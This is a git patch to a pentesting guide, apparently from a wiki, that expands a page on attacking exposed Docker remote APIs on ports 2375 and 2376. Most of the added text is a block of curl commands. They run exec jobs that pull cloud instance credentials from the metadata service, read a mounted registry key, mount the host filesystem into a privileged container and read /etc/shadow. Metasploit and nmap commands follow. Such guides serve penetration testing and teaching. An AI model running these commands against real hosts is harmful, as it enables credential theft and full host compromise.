From bfb72cbb4db2f6d13f4d07e5749deaa80d9fec42 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 31 Dec 2020 16:14:52 +0000 Subject: [PATCH] GitBook: [master] 2 pages modified --- SUMMARY.md | 2 +- pentesting/2375-pentesting-docker.md | 59 +++++++++++++++++++++++++--- 2 files changed, 54 insertions(+), 7 deletions(-) diff --git a/SUMMARY.md b/SUMMARY.md index 83e3f269..e2741ff3 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -262,7 +262,7 @@ * [1883 - Pentesting MQTT \(Mosquitto\)](pentesting/1883-pentesting-mqtt-mosquitto.md) * [2049 - Pentesting NFS Service](pentesting/nfs-service-pentesting.md) * [2301,2381 - Pentesting Compaq/HP Insight Manager](pentesting/pentesting-compaq-hp-insight-manager.md) -* [2375 Pentesting Docker](pentesting/2375-pentesting-docker.md) +* [2375, 2376 Pentesting Docker](pentesting/2375-pentesting-docker.md) * [3260 - Pentesting ISCSI](pentesting/3260-pentesting-iscsi.md) * [3299 - Pentesting SAPRouter](pentesting/3299-pentesting-saprouter.md) * [3306 - Pentesting Mysql](pentesting/pentesting-mysql.md) diff --git a/pentesting/2375-pentesting-docker.md b/pentesting/2375-pentesting-docker.md index 000f6fde..1a128400 100644 --- a/pentesting/2375-pentesting-docker.md +++ b/pentesting/2375-pentesting-docker.md @@ -1,4 +1,4 @@ -# 2375 Pentesting Docker +# 2375, 2376 Pentesting Docker ## Docker Basics @@ -79,9 +79,7 @@ podman ls ``` {% endhint %} -## 2375 - Pentesting Docker API - -### Basic Information +## Basic Information Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host’s environment. @@ -92,14 +90,63 @@ PORT STATE SERVICE 2375/tcp open docker ``` -### Enumeration +## Enumeration + +### Manual + +Note that in order to enumerate the docker API you can use the `docker` command or `curl` like in the following example: + +```bash +curl -s http://open.docker.socket:2375/version | jq #Get version +docker -H open.docker.socket:2375 version #Get version +``` + +If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service. + +#### Curl + +Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API. + +```bash +#List containers +curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq +#List processes inside a container +curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq +#Set up and exec job to hit the metadata URL +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}' +#Get the output +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}' +# list secrets (no secrets/swarm not set up) +curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq +#Check what is mounted +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}' +#Get the output by starting the exec +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}' +#Cat the mounted secret +curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}' +#List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables) +curl -s –insecure https://tls-opendocker.socket:2376/services | jq +#Creating a container that has mounted the host file system and read /etc/shadow +curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}' +curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test +curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}' +curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}' +#Stop the container +curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop +#Delete stopped containers +curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune +``` + +If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) + +### Automatic ```bash msf> use exploit/linux/http/docker_daemon_tcp nmap -sV --script "docker-*" -p ``` -### Compromising +## Compromising In the following page you can find a way to **scape from a docker container**: